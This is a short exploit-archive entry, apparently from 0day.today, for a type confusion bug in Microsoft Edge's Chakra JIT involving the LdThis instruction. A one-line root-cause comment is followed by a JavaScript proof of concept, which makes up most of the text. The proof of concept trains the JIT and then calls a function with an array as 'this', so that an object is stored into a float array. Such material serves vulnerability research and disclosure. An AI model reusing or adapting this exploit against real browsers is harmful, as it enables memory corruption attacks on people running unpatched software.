Microsoft Edge Chakra JIT - LdThis Type Confusion Exploit

/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.
 
PoC:
*/
 
function opt(arr) {
    arr[0] = 1.1;
    this[0] = {};
    arr[0] = 2.3023e-320;
}
 
function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }
 
    opt.call(arr, arr);
    print(arr);
}
 
main();

#  0day.today [2018-03-13]  #